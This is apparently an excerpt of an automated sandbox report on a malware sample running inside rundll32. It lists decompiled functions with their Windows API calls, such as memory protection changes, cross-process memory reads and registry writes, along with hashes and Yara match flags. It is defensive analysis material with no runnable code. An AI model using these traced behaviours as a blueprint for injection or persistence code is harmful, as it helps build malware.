                              • API String ID: 1141245775-0
                              • Opcode ID: 4b1608e8929bbd4492da4bb46e1af1eccfa5baa45ea10128acd65c4d67515e7e
                              • Instruction ID: e3ae9bc295b0115e94fbd2a3e1cf30a049087d937b4ca3b1f59dbfb940791dfa
                              • Opcode Fuzzy Hash: 4b1608e8929bbd4492da4bb46e1af1eccfa5baa45ea10128acd65c4d67515e7e
                              • Instruction Fuzzy Hash: E9F08C30655304AFDB019B788C4AE6A7B79FB42731B520318F925872C0EB749C118BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 007E1198 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131memoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.417936945.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_7e0000_rundll32.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID: X
                              • API String ID: 544645111-3081909835
                              • Opcode ID: d03c72d7e842fa4832f716df22808e09d8396a560db8b875853e5f1b04437fe4
                              • Instruction ID: 07786d6ab351686d10f9ccd354293264e666848ce2f4cd41ed5d5d80c44f1eec
                              • Opcode Fuzzy Hash: d03c72d7e842fa4832f716df22808e09d8396a560db8b875853e5f1b04437fe4
                              • Instruction Fuzzy Hash: BF51AAB4E052488FCB18DF99C494A9DFBB1FF88310F25816ED959AB356D734A845CF80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594A451 Relevance: 5.1, APIs: 4, Instructions: 110COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0594A477
                              • memcpy.NTDLL ref: 0594A49F
                                • Part of subcall function 05947950: NtAllocateVirtualMemory.NTDLL(0594EB0F,00000000,00000000,0594EB0F,00003000,00000040), ref: 05947981
                                • Part of subcall function 05947950: RtlNtStatusToDosError.NTDLL(00000000), ref: 05947988
                                • Part of subcall function 05947950: SetLastError.KERNEL32(00000000), ref: 0594798F
                              • GetLastError.KERNEL32(00000010,00000218,0595386D,00000100,?,00000318,00000008), ref: 0594A4B6
                              • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0595386D,00000100), ref: 0594A599
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                              • String ID:
                              • API String ID: 685050087-0
                              • Opcode ID: 0185e7ec3d9b23cbe7d258af1659f2bb7c591d7df9266f30b109a95c8b4c7b05
                              • Instruction ID: 958a5bd2bb91046c715c256a6df067c694d64b1f28bbf5df9002dab3988ba5f2
                              • Opcode Fuzzy Hash: 0185e7ec3d9b23cbe7d258af1659f2bb7c591d7df9266f30b109a95c8b4c7b05
                              • Instruction Fuzzy Hash: B04162B1644701AFD721DF65D945FABBBE9FB88310F00892DF999C6250E730E9148F52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05946C1E Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594B7A4: RegCreateKeyA.ADVAPI32(80000001,05F3B7F0,?), ref: 0594B7B9
                                • Part of subcall function 0594B7A4: lstrlen.KERNEL32(05F3B7F0,00000000,00000000,00000000,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C,00000008,00000003), ref: 0594B7E2
                              • RegQueryValueExA.KERNEL32(00000000,75BCC740,00000000,00000000,05959068,0593E6ED,00000001,00000000,05F3C314,0595906E,00000000,00000000,0594CB01,05F3C314,75BCC740,00000000), ref: 05946C72
                              • RegSetValueExA.KERNEL32(05959068,00000003,00000000,00000003,05959068,00000028), ref: 05946CB3
                              • RegCloseKey.ADVAPI32(?), ref: 05946CBF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Value$CloseCreateQuerylstrlen
                              • String ID:
                              • API String ID: 2552977122-0
                              • Opcode ID: ab9a5980b9b1366058f4402f8e52eadea909ca4cb72a6aef1d1b2c860dffe23d
                              • Instruction ID: 8fb1ae621fadd88047396558cdeff2d5510a773c4f33e77165e4e18c618edf6f
                              • Opcode Fuzzy Hash: ab9a5980b9b1366058f4402f8e52eadea909ca4cb72a6aef1d1b2c860dffe23d
                              • Instruction Fuzzy Hash: BD3138B1914218EFEB21DBA8E945DAEBFBDFB45761B10452AFA00A2240D7345E64CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05936261 Relevance: 4.6, APIs: 3, Instructions: 73registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0595087A: lstrlen.KERNEL32(?,00000000,0594BA3E,00000027,0595A1E8,?,00000000,?,?,0594BA3E,?,00000001,?,05940971,00000000,?), ref: 059508B0
                                • Part of subcall function 0595087A: lstrcpy.KERNEL32(00000000,00000000), ref: 059508D4
                                • Part of subcall function 0595087A: lstrcat.KERNEL32(00000000,00000000), ref: 059508DC
                              • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 059362A8
                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 059362BE
                              • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 05936307
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Open$Closelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 4131162436-0
                              • Opcode ID: 2211f6c46a68ccb65e15905a45aab01a455f163bd1d6d1da2cdc19ee9a9ddbca
                              • Instruction ID: 5edce2575a95afca7dd3cdaa70235134fb9c859c67d12140547002d30e6af3fa
                              • Opcode Fuzzy Hash: 2211f6c46a68ccb65e15905a45aab01a455f163bd1d6d1da2cdc19ee9a9ddbca
                              • Instruction Fuzzy Hash: 43213872A10209FFDB01DF95DD86CAEBBBDFB44254B104065F602A3111E771AE64DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594B7A4 Relevance: 4.5, APIs: 3, Instructions: 40registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,05F3B7F0,?), ref: 0594B7B9
                              • RegOpenKeyA.ADVAPI32(80000001,05F3B7F0,?), ref: 0594B7C3
                              • lstrlen.KERNEL32(05F3B7F0,00000000,00000000,00000000,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C,00000008,00000003), ref: 0594B7E2
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateOpenlstrlen
                              • String ID:
                              • API String ID: 2865187142-0
                              • Opcode ID: bc0bd6b72005292dc1cf6c95c5d73f7b57cbfbd586d5ffde8f94006f9f3fa9a4
                              • Instruction ID: 14e5595849a241b44c1211351c5f610cfdbcacd5d80d3e521be5e17b9383c43e
                              • Opcode Fuzzy Hash: bc0bd6b72005292dc1cf6c95c5d73f7b57cbfbd586d5ffde8f94006f9f3fa9a4
                              • Instruction Fuzzy Hash: 4AF04976104208FFEB119F91DC89FABBB7DEB456A4F148009F90689240DA70DA80CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594E831 Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SetEvent.KERNEL32(00000330,0594C3DB), ref: 0594E83B
                                • Part of subcall function 059334FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0594E846), ref: 05933528
                                • Part of subcall function 059334FF: RtlDeleteCriticalSection.NTDLL(0595A3E0), ref: 0593355B
                                • Part of subcall function 059334FF: RtlDeleteCriticalSection.NTDLL(0595A400), ref: 05933562
                                • Part of subcall function 059334FF: ReleaseMutex.KERNEL32(0000059C,00000000,?,?,?,0594E846), ref: 0593358B
                                • Part of subcall function 059334FF: CloseHandle.KERNEL32(?,?,0594E846), ref: 05933597
                                • Part of subcall function 059334FF: ResetEvent.KERNEL32(00000000,00000000,?,?,?,0594E846), ref: 059335A3
                                • Part of subcall function 059334FF: CloseHandle.KERNEL32(?,?,0594E846), ref: 059335AF
                                • Part of subcall function 059334FF: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,0594E846), ref: 059335B5
                                • Part of subcall function 059334FF: SleepEx.KERNEL32(00000064,00000001,?,?,0594E846), ref: 059335C9
                                • Part of subcall function 059334FF: HeapFree.KERNEL32(00000000,00000000,?,?,0594E846), ref: 059335ED
                                • Part of subcall function 059334FF: RtlRemoveVectoredExceptionHandler.NTDLL(057505B8), ref: 05933623
                                • Part of subcall function 059334FF: SleepEx.KERNEL32(00000064,00000001,?,?,0594E846), ref: 0593363F
                              • CloseHandle.KERNEL32(00000330), ref: 0594E850
                              • HeapDestroy.KERNELBASE(05B40000), ref: 0594E860
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                              • String ID:
                              • API String ID: 2773679374-0
                              • Opcode ID: 30e0190265641807119e334c0c144cf8b0b2a29ab7d1a26b3f552323d797036c
                              • Instruction ID: c97c207388cf3b3949ae9b02472871ed73f829ac787730ce75531735f96e3226
                              • Opcode Fuzzy Hash: 30e0190265641807119e334c0c144cf8b0b2a29ab7d1a26b3f552323d797036c
                              • Instruction Fuzzy Hash: 31E062707283419BDF206F75E84EE177FACBB045827490924B405D2245DF24D854EB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 007E139E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94memoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.417936945.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_7e0000_rundll32.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID: X
                              • API String ID: 544645111-3081909835
                              • Opcode ID: a1d2d7a04a4218a24bdf6c05c71c0ad36df5e92cfbdc4d984bac015a8c813b41
                              • Instruction ID: 03230735a31956401cfba6a1b588459eead6e1131ce7cf48d06b1116e80d23ac
                              • Opcode Fuzzy Hash: a1d2d7a04a4218a24bdf6c05c71c0ad36df5e92cfbdc4d984bac015a8c813b41
                              • Instruction Fuzzy Hash: D3418CB5E01628CFDB64CF19C880B88FBB1BF49304F55819AC909AB356D735AE85CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05945D7A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15threadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 059371B4: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0595A170,00000000,05945D81,?,0593F2F7,?), ref: 059371D3
                                • Part of subcall function 059371B4: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0595A170,00000000,05945D81,?,0593F2F7,?), ref: 059371DE
                                • Part of subcall function 059371B4: _wcsupr.NTDLL ref: 059371EB
                                • Part of subcall function 059371B4: lstrlenW.KERNEL32(00000000), ref: 059371F3
                              • ResumeThread.KERNEL32(00000004,?,0593F2F7,?), ref: 05945D8F
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                              • String ID: v
                              • API String ID: 3646851950-1801730948
                              • Opcode ID: 4ca58a04c57760958cdb0cc69eba71acd3bf7cc4fce21920978d8c595cb6ab70
                              • Instruction ID: 558b8bc3f0cd216c8530cafbce498d08ac010d8bba0f8209315fe9c2d14a4d72
                              • Opcode Fuzzy Hash: 4ca58a04c57760958cdb0cc69eba71acd3bf7cc4fce21920978d8c595cb6ab70
                              • Instruction Fuzzy Hash: 70D05E38208300ABE7216790CE0FF26BD96AF80B51F01C454F98650064D7729CA0AA44
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05943223 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 05943253
                              • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 0594329A
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                              • String ID:
                              • API String ID: 552344955-0
                              • Opcode ID: c958f1cd21c283ac9d88044bbbbe6256929c5040e7b8924b4dddfdc1b4818570
                              • Instruction ID: ea8641986accc5612410dc447558c1ff7c7d1deccb1403574a59328e23ad3f83
                              • Opcode Fuzzy Hash: c958f1cd21c283ac9d88044bbbbe6256929c5040e7b8924b4dddfdc1b4818570
                              • Instruction Fuzzy Hash: C9117071A00208BBCB119FF9C848FAEBBBDFF85654F214459E40197240EBB49E45CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05949370 Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,059402F2,69B25F44,?,?,00000000), ref: 059493AD
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,059402F2), ref: 0594940E
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$FileFreeHeapSystem
                              • String ID:
                              • API String ID: 892271797-0
                              • Opcode ID: 95fd2ce4a1eedcc1616497ad0f25f7a6171deb05527d08aa85a64b927f20ad76
                              • Instruction ID: 9c2a3689aa3b92c04496443c1356fbe830378c3631418d30dc4811ca4e026c0f
                              • Opcode Fuzzy Hash: 95fd2ce4a1eedcc1616497ad0f25f7a6171deb05527d08aa85a64b927f20ad76
                              • Instruction Fuzzy Hash: 05113AB5914209EBCF10EBA4D94AE9EBBBCEB08215F000261A905E2150DB74AB54DF64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594E869 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(0595A400), ref: 0594E873
                              • RtlLeaveCriticalSection.NTDLL(0595A400), ref: 0594E8AF
                                • Part of subcall function 05931A0A: lstrlen.KERNEL32(?,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977,0594893A,?,?), ref: 05931A58
                                • Part of subcall function 05931A0A: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931A6A
                                • Part of subcall function 05931A0A: lstrcpy.KERNEL32(00000000,?), ref: 05931A79
                                • Part of subcall function 05931A0A: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,059519C5,059594D8,?,?,00000004,00000000,?,00000000,05950977), ref: 05931A8A
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                              • String ID:
                              • API String ID: 1872894792-0
                              • Opcode ID: 88d33daa5c832f5838ab12c53642ea1598a291304338d0ec2243e148a3b57a48
                              • Instruction ID: 7f0d7ceb00cac615ff3ff28ede0b2684661eba080422301e8f82b51ef3686d97
                              • Opcode Fuzzy Hash: 88d33daa5c832f5838ab12c53642ea1598a291304338d0ec2243e148a3b57a48
                              • Instruction Fuzzy Hash: 12F0A7352153159F86206F589889C75FBACFBC5127312425AED1653300CB755C519B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593C9A9 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(0595A05C), ref: 0593C9BE
                                • Part of subcall function 05942331: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0594235C
                                • Part of subcall function 05942331: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05942369
                                • Part of subcall function 05942331: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 059423F5
                                • Part of subcall function 05942331: GetModuleHandleA.KERNEL32(00000000), ref: 05942400
                                • Part of subcall function 05942331: RtlImageNtHeader.NTDLL(00000000), ref: 05942409
                                • Part of subcall function 05942331: RtlExitUserThread.NTDLL(00000000), ref: 0594241E
                              • InterlockedDecrement.KERNEL32(0595A05C), ref: 0593C9E2
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                              • String ID:
                              • API String ID: 1011034841-0
                              • Opcode ID: e882677675d3449b1890a958d678399e1ac21258f785d6d699482feeb7376496
                              • Instruction ID: 5ad93da34d608d9c4f6069a0689fbd835bab90c4cad8d1b0137508f28e2e6c75
                              • Opcode Fuzzy Hash: e882677675d3449b1890a958d678399e1ac21258f785d6d699482feeb7376496
                              • Instruction Fuzzy Hash: 5BE0123235CA22D7CF219A749C4AF6EAA69FF44A92F024614F945F1154EB218C6097D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05951DED Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 059455E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0594561D
                                • Part of subcall function 059455E4: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05945653
                                • Part of subcall function 059455E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0594565F
                                • Part of subcall function 059455E4: lstrcmpi.KERNEL32(?,00000000), ref: 0594569C
                                • Part of subcall function 059455E4: StrChrA.SHLWAPI(?,0000002E), ref: 059456A5
                                • Part of subcall function 059455E4: lstrcmpi.KERNEL32(?,00000000), ref: 059456B7
                                • Part of subcall function 059455E4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05945708
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,059560E0,0000002C,059490D3,05F38E36,?,00000000,0594A484), ref: 05951E2C
                                • Part of subcall function 0594A806: GetProcAddress.KERNEL32(?,00000000), ref: 0594A82F
                                • Part of subcall function 0594A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05946230,00000000,00000000,00000028,00000100), ref: 0594A851
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,059560E0,0000002C,059490D3,05F38E36,?,00000000,0594A484,?,00000318), ref: 05951EB7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                              • String ID:
                              • API String ID: 4138075514-0
                              • Opcode ID: 29331b09892f01540f4909c945ade585ccba3bd3a9d5e053f03638c39c019e0c
                              • Instruction ID: 3306d743c9fae4469ad5bab8ac83523ff3ac3b95555701eefffa1ece68db31d1
                              • Opcode Fuzzy Hash: 29331b09892f01540f4909c945ade585ccba3bd3a9d5e053f03638c39c019e0c
                              • Instruction Fuzzy Hash: 7A21E271E01228EBCF11DFA5DC84ADEBBB9FF48720F10812AE955B6250C3345A65DFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059518C0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,05950977,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059518D5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: b45cdf2e6852559ea5c3debfc36d7b0511d66675a2806a47ae3af18c51b272b3
                              • Instruction ID: 3d118ae656aab3c1a0e8546e18917fab3224b623a47a1de810efc93ec1ed0509
                              • Opcode Fuzzy Hash: b45cdf2e6852559ea5c3debfc36d7b0511d66675a2806a47ae3af18c51b272b3
                              • Instruction Fuzzy Hash: 8731B475A00215EFCB10DF98E885EADBBFAFB44330F514569EA45AB200C734AD61DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05934A9F Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(?,059599DC,-0000000C,?,?,?,0594C01A,00000006,?,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 05934ADA
                                • Part of subcall function 059374AE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0595A400), ref: 059374C5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HandleInformationModuleProcessQuery
                              • String ID:
                              • API String ID: 2776635927-0
                              • Opcode ID: e166eba4dfebdb7354d03e2520e41bdf27592816bcaddb2e907f537a1e145142
                              • Instruction ID: 1fe044fa57543d1ee47dfabc30eee5330e47588aa050777c30f585c277ca941e
                              • Opcode Fuzzy Hash: e166eba4dfebdb7354d03e2520e41bdf27592816bcaddb2e907f537a1e145142
                              • Instruction Fuzzy Hash: 41218135600205EFDF20CF96C49AE6E77BDFF44294726852AE94ACB250D772E901DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0595309E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                              Download Yara Rule
                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 05953090
                                • Part of subcall function 059531E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,05930000), ref: 0595325C
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: db895d6f7594839f76aed77dc0e4825db5c3fe1b25fbef2b0175f3d5a7ce7a38
                              • Instruction ID: 17e831790ae0e5f62d218924aca8e7ed07934fcc302a9db8d4926a5dfb49fd79
                              • Opcode Fuzzy Hash: db895d6f7594839f76aed77dc0e4825db5c3fe1b25fbef2b0175f3d5a7ce7a38
                              • Instruction Fuzzy Hash: AFA00295269201BD3505D5755D06C37571DC4C49B17604D1DEC1284040955219651371
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05953083 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                              Download Yara Rule
                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 05953090
                                • Part of subcall function 059531E3: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,000260DC,05930000), ref: 0595325C
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: be5cfedcb995f42093c30a81be8abd61b6f275ebb93239562e0e93c47d9cbfa9
                              • Instruction ID: 7a086272991c02904b3442b2ff24ead03a6c66e25975505ff9c40f7956b9fce6
                              • Opcode Fuzzy Hash: be5cfedcb995f42093c30a81be8abd61b6f275ebb93239562e0e93c47d9cbfa9
                              • Instruction Fuzzy Hash: 79A002952A56017D3515D5755D06C37571DC4D09717604E1DFC1194040955219651371
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594E803 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: cba01f6f2aaa8e5c82cfe619d3a600b3fb159ddb9213a719504b854df4821f9d
                              • Instruction ID: 4a8c28609b50905a9c4f551fa216e4e851b93bb0852f5b637d4716361d1df6a1
                              • Opcode Fuzzy Hash: cba01f6f2aaa8e5c82cfe619d3a600b3fb159ddb9213a719504b854df4821f9d
                              • Instruction Fuzzy Hash: 41B01231028300EBCA014F20DD06F05FF21AB54701F014410B20C800608B310878FB08
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05939394 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 7a48c778be095871dbe5d588dbbce9cef899be8e46a451381c68a1998af262ce
                              • Instruction ID: f14924fe92caf8055a4299aebe56dc7878af9067fb77957a96699b503eeecf79
                              • Opcode Fuzzy Hash: 7a48c778be095871dbe5d588dbbce9cef899be8e46a451381c68a1998af262ce
                              • Instruction Fuzzy Hash: 1FB01271128300EBCA014F20DE06F05FF21A754701F014010B30C440608B310834FB08
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 007E23A4 Relevance: 1.3, APIs: 1, Instructions: 85memoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.417936945.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_7e0000_rundll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
